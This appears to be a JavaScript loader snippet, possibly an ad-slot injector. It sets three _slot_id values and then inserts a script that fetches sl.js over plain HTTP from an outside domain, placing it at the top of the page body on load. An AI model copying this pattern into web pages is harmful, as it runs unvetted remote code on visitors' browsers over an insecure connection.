
(function () {
    if (!document.body) return setTimeout(arguments.callee, 50);
    
        var e = document.createElement("script");
        e.type = "text/javascript";
        e.text += '_slot_id = "b93ca00c-9af8-4ea1-b668-1b1c435459f9";';
        document.body.insertBefore(e, document.body.children.item(0));
    
        var e = document.createElement("script");
        e.type = "text/javascript";
        e.text += '_slot_id = "10d93fe8-6f99-4e03-87f8-b7e00b03173f";';
        document.body.insertBefore(e, document.body.children.item(0));
    
        var e = document.createElement("script");
        e.type = "text/javascript";
        e.text += '_slot_id = "ab9c15b1-bd95-438d-b25c-0ebf4cfc274e";';
        document.body.insertBefore(e, document.body.children.item(0));
    
    var e = document.createElement("script");
    e.src = "http://www.fjlqqc.com/static/sl/sl.js?v=1a5d99420904b4f4f65ecc65aa10f0f3";
    e.type = "text/javascript";
    e.async = true;
    document.body.insertBefore(e, document.body.children.item(0));
})();








